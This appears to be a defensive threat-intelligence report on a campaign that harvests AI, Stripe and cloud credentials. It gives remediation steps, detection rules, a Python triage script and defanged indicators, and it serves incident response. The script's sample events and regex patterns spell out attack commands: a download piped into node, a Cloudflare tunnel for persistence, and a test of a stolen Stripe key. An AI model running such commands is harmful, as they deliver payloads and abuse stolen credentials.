
Chinese Cybercrime Infrastructure: OpenClaw / Paperclip Operation
Indicators of Compromise
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
| Step | Action | Detail |
|---|---|---|
| 1 -- Isolate | Network-isolate the affected server | Do not shut down -- keep the host running to preserve memory (the NKN agent is fileless). Block all IOCs at the perimeter. Terminate active sessions. |
| 2 -- Preserve | Collect forensic evidence | Memory dump (avml/LiME). Preserve: bash_history, /tmp contents, web server logs, `netstat -anp` output, /proc/*/cmdline. Take a disk image before any cleanup. |
| 3 -- Hunt | Search for and remove all persistence mechanisms | Kill the processes and delete the files from /tmp: d2, pl, l64, cf-client, p2p-client. Scan web directories for webshells (.php, .jsp, .aspx). Check cron jobs and systemd services. Run YARA rules 7.1-7.4 on all web servers in the same network segment. |
| 4 -- Rotate | Rotate every credential on the affected system | AI API keys (OpenAI, Anthropic, Gemini, Azure, DeepSeek, Moonshot, Firecrawl), Stripe sk_live_* keys, GitHub tokens, DB passwords, AWS access keys. Check Stripe Logs for /v1/balance calls and unauthorized charges. |
| 5 -- Audit | Audit API usage for active key abuse | OpenAI/Anthropic usage dashboards: look for off-hours spikes or unknown IPs. Stripe Logs: filter /v1/account and /v1/balance calls. GitHub Security Log: unauthorized API calls or repo access. AWS CloudTrail: unexpected Lambda invocations. |
| 6 -- Rebuild | Rebuild from a trusted clean image | Do not restore from the compromised disk. Deploy application code from version control. Inject secrets via a secrets manager -- never use .env files again on internet-exposed servers. Validate CVE patches before bringing the new instance online. |
| Sector | Key Risk | Priority Action |
|---|---|---|
| Web3 / Crypto | Primary FOFA target; ~100K crypto addresses monitored by attacker | Rotate wallet integration keys. Audit smart contract access logs. Verify no unauthorized address monitoring. |
| Fintech / Payments | Stripe sk_live_* keys validated and tested within hours of harvest | Check Stripe Logs for /v1/account and /v1/balance calls NOW. Rotate all live Stripe keys. Enable Radar fraud rules. |
| AI / ML Platforms | OpenAI, Anthropic, Gemini, DeepSeek, Moonshot, Firecrawl keys are the primary harvest target | Rotate all AI keys immediately. Check usage dashboards for abnormal consumption. Set spend alerts per key. |
| Cloud-Native / SaaS | AWS Lambda credentials, DATABASE_URL, GitHub tokens harvested -- enables cloud lateral movement | CloudTrail: unauthorized Lambda calls. GitHub: token misuse and secret scanning alerts. Rotate all cloud credentials. |
| Security Vendors | Explicitly targeted in FOFA queries; hold customer intelligence and elevated trust relationships | Audit FOFA visibility. Patch all internet-exposed React and Java apps. Review customer data access logs. |
Detection Quick Reference
| Rule | Type | Detects | Priority |
|---|---|---|---|
| Sigma-8.1 | SIEM | Env variable dump executed from web server process -- direct exploitation indicator | CRITICAL |
| Sigma-8.2 | SIEM | `curl URL \| node` or `echo base64 \| node` -- fileless NKN C2 agent delivery | HIGH |
| Sigma-8.3 | SIEM | cf-client + trycloudflare.com -- Cloudflare tunnel SSH persistence | HIGH |
| Sigma-8.4 | SIEM | Outbound connection to nkn.org:30003 -- decentralized C2; no legitimate enterprise use | HIGH |
| Sigma-8.5 | SIEM | api.stripe.com + sk_live_ in process cmd -- stolen Stripe key validation | CRITICAL |
| YARA-7.1 | EDR | React2Shell exploit scripts (3.py / 11.py): FOFA keywords, WAF bypass, env dump | HIGH |
| YARA-7.2 | EDR | NKN fileless C2 agent: mainnet-seed addresses, CONTROL_ID, workers.dev, Node crypto | HIGH |
| YARA-7.3 | EDR | Credential harvest file: AI API key names, Stripe strings, harvested_keys pattern | HIGH |
| YARA-7.4 | EDR | Persistence: cf-client + trycloudflare.com, p2p-client + mayun, /tmp/l64 drop path | HIGH |
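The five Sigma-8.x behaviours in the table above, as an added Python triage example that is not part of this report or of any published rule set: it runs the same five conditions over SIEM-normalised process and network events. The `Event` field names, the web-server parent list and the sample events are my own constructed assumptions; map the fields from your EDR's schema.

```python
import re
from dataclasses import dataclass

@dataclass
class Event:
    parent: str            # image name of the parent process (assumed field name)
    cmdline: str = ""      # full command line of the spawned process
    dst_host: str = ""     # destination host for network events
    dst_port: int = 0

# Parents that indicate a web-application process spawned the command (assumed list).
WEB_SERVER_PARENTS = {"nginx", "apache2", "httpd", "php-fpm", "node", "java", "tomcat"}
# Sigma-8.1: env/printenv, a .env file read, or /proc/*/environ from a web server child.
ENV_DUMP_RE = re.compile(r"(?:^|[\s;|&])(?:env|printenv)(?:[\s;|&]|$)|cat\s+\S*\.env\b|/proc/\S+/environ")
# Sigma-8.2: a download or a base64 decode piped straight into node (fileless delivery).
FILELESS_NODE_RE = re.compile(r"(?:curl|wget)\s[^|]*\|\s*node\b|base64\s+(?:-d|--decode)[^|]*\|\s*node\b")
# Sigma-8.3: cf-client and a trycloudflare.com hostname in the same command line.
CF_TUNNEL_RE = re.compile(r"cf-client(?=.*trycloudflare\.com)|trycloudflare\.com(?=.*cf-client)")
# Sigma-8.5: Stripe API host and a live secret key together in one command line.
STRIPE_RE = re.compile(r"api\.stripe\.com(?=.*sk_live_)|sk_live_(?=.*api\.stripe\.com)")

def nkn_seed_connection(ev: Event) -> bool:
    # Sigma-8.4: outbound TCP 30003 to nkn.org or any of its subdomains.
    host = ev.dst_host.lower()
    return ev.dst_port == 30003 and (host == "nkn.org" or host.endswith(".nkn.org"))

RULES = (
    ("Sigma-8.1", "CRITICAL", lambda ev: ev.parent in WEB_SERVER_PARENTS and bool(ENV_DUMP_RE.search(ev.cmdline))),
    ("Sigma-8.2", "HIGH", lambda ev: bool(FILELESS_NODE_RE.search(ev.cmdline))),
    ("Sigma-8.3", "HIGH", lambda ev: bool(CF_TUNNEL_RE.search(ev.cmdline))),
    ("Sigma-8.4", "HIGH", nkn_seed_connection),
    ("Sigma-8.5", "CRITICAL", lambda ev: bool(STRIPE_RE.search(ev.cmdline))),
)

def triage(events):
    """Return (rule_id, priority, event) for every rule that each event matches."""
    return [(rid, prio, ev) for ev in events for rid, prio, match in RULES if match(ev)]

# Constructed sample telemetry (not real events): one benign line, then one per rule.
SAMPLE_EVENTS = [
    Event("sshd", "ls -la /var/www"),
    Event("node", "sh -c 'cat /proc/self/environ'"),
    Event("nginx", "sh -c 'curl http://example.invalid/a.js | node'"),
    Event("bash", "cf-client tunnel --url ssh://localhost:22 abc.trycloudflare.com"),
    Event("node", "", "mainnet-seed-0001.nkn.org", 30003),
    Event("bash", "curl -u sk_live_PLACEHOLDER: https://api.stripe.com/v1/balance"),
]

if __name__ == "__main__":
    for rid, prio, ev in triage(SAMPLE_EVENTS):
        print(f"{rid} [{prio}] parent={ev.parent} cmd={ev.cmdline!r} dst={ev.dst_host}:{ev.dst_port}")
```

Tune `WEB_SERVER_PARENTS` to the process names your application tier actually runs under; Sigma-8.1 is the only rule that depends on it.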
| Indicator | Type | Block Method |
|---|---|---|
| 124[.]220[.]164[.]14 | C2 IP / Reverse Shell (port 33306) | Firewall egress -- all ports |
| soft-silence-d978[.]13544681192[.]workers[.]dev | Fileless C2 Delivery | DNS block + proxy filter |
| d6[.]tfdl[.]net | Payload Delivery (NKN agent, cf-client) | DNS block + proxy filter |
| anson-aeromarine-ocularly[.]ngrok-free[.]dev | Tor Proxy Endpoint | DNS block |
| kf[.]unpkg[.]top | Malicious Domain | DNS block |
| deltajohnsons[.]com | FOFA Account Registration Domain | DNS block + threat intel feed |
| *.nkn.org port 30003 | NKN P2P C2 Seed Nodes | Firewall: block outbound port 30003 |
| | Operator Email | Threat intel feed |
| | Operator Account | Threat intel feed |